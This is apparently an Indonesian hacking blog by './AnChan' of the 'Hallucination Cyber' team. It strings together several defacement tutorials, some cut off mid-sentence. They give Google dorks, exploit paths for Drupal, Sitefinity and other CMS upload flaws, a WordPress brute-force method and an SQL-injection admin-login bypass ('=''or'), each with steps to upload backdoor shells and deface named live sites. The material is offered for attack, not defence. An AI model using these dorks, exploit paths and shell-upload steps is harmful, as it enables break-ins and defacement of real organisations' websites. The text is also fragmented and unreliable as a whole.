./AnChan

31337FileExists Exploit and Upload Shell Bahan Bahan : 1. Dork : - "31337FileExists"                 -  "31337FileExists" inurl:"node" 2. Exploit : /sites/default/files/up.php 3. Shell Backdoor :      Shell mini ( Jika Shell biasa tidak support ) :  Download 4. Script Deface :  Download Step By Step : 1. Dorking dulu di Google  "31337FileExists" 2. Pilih Salah Satu Web     Live Target :  http://roundhousearchitecture.com/ 3. Masukkan Exploit :  sites/default/files/up.php     contoh :  http://roundhousearchitecture.com/ sites/default/files/up.php     Jika Vuln akan ada Tempat Upload seperti ini 4. Tinggal Upload deh shell backdoor kalian  Jika sukses akan seperti ini 5. Tinggal masuk deh ke akses shell yang udah di Upload      Akses shell : / sites/default/files/[nama_shell].php     contoh :  http://roundhousearchitecture.com/ sites/default/files/guel.php Dan BeginiLah Hasilnya Terserah Kalian

Deface Metode Drupal File With Tamper Notice Dikit : Sebenarnya Ane mau kasih nama Exploitnya "Sange Hidden File Upload" Knapa?! Karena Masih Fresh 😁 Maklum Baru Nemu, Tapi ahh Sudahlah Gamasuk akal 😆 Langsung saja Tutorialnya 😃 Bahan : 1. File upload =>  edit dulu file .txt yang akan di upload trus save dengan extensi .php.jpg ( knapa?! karena nanti akan di tamper dan hasilnya akan menjadi .php.txt ) 2. Tamper Data ( Gunakan Mozilla ) 3. Dork : -  inurl:"/register?destination=node/" intext:"Allowed file types: png gif jpg"                   ( Kembangi Lagi Biar Lebih Fresh )  Step By Step : 1. Dorking Dulu ke Google  inurl:"/register?destination=node/" intext:"Allowed file types: png gif jpg" 2. Pilih Salah Satu Web     Live Target :  http://alumni.pec.ac.in/user/register?destination=node/77   3. Aktifkan Dulu Tamper Data'nya     Open Menu => Developer => Open Tamper Data

Segini Dulu ya Besok Update Lagi. Sekian Dari Saya./AnChan Special Thanks To Hallucination Cyber

Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ] Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v Langsung Saja... Bahan : 1. shell aspx => Yang belom punya download disini    passwordnya : admin 2. Dork : - inurl:"/Sitefinity/login.aspx"                 - "UserControls/Dialogs"                 - "Sitefinity: Login" 3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx 4. Dan yang paling Penting => "KESABARAN" :'v Step By Step : 1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx" 2. Pilih Salah Satu Web Target     Live Target : http://www.calstart.org/ 3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx     Contoh : http://www.calstart.org/sitefinity/UserControls/Dial

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^ Pertama Tutorial WP BruteForce Menggunakan Python WordPress BruteForce Bahan : Python         Script Python           NB : Setelah Python Terinstal, copy script python lalu save dengan format .py Wordlist Dork : - inurl:wp-login.php            - Author/admin "text" Step By Step : 1. Cari dulu site WP yang akan di WP BruteForce menggunakan dork diatas 2. Cari username WP-nya dengan menggunakan tools ada searching google :v Use Your Brain :'v     cara mudahnya dengan memasukkan username "admin" lalu memasukkan password asal dulu Jika muncul Notif seperti dibawah ini berarti usernamenya admin 3. Tinggal kita BruteForce Passwordnya 4. Instal Dahulu Python-nya 5. Setelah

Baiklah Saya akan mengajarkan cara Deface Terbaru Yaitu Deface Register Pro Taxi Shell Upload Bahan bahan yang harus di siapkan : -Dork -SC Deface -Shell  "Dan tentu saja Otak" 1. Langkah pertama Temukan Target anda dengan Dork ini    inurl:public/user/signup 2. Ciri ciri web Vuln Ialah seperti ini 3. Klik Create An Account. Isi data sebebas anda :D 4. Jika Sudah Klik Profile. Kemudian Upload Shell Agan 5. Cara Menemukan Shell. Tekan CTRL+U di keyboard     kemudian cari format apa yg kalian Upload Mimin: Upload format PHP 6. Jreng Jreng Shell udah terupload Bebas Mau ngapain :D 7. Mimin cuman upload SC Deface AJa Jangan Lupa Like Nya :) Sekianlah Postingan Dari ./An tentang "Deface Register Pro Taxi Shell Upload" Semoga Bisa Bermanfaat!

ATQITS Admin Panel Bypass [+]================================================================== [+] Exploit Title : ATQITS Admin Panel Bypass [+] [+] Dork : "ATQITS ALL RIGHT RESERVED." [+] [+]============================================================= [+] [+] Author : ./AnChan [+] Team : Hallucination Cyber [+] Tested on : Windows XP [+] [+]================================================================== [+] [+] Admin Panel : http://www.site/adminpannel [+] Login With User And Pass : '=''or' [+] [+]================================================================== [+] [+] Demo : [+] http://umweltindia.com/adminpannel/ [+] http://www.huntermediahouse.com/adminpannel/ [+] http://www.mapleparadise.com/adminpannel/ [+]================================================================== [+] Sumber : https://cxsecurity.com/issue/WLB-2017090127 [+]================================================================== Sekianlah Postingan D

BaikLah Saya Akan MengShare Cara" Deface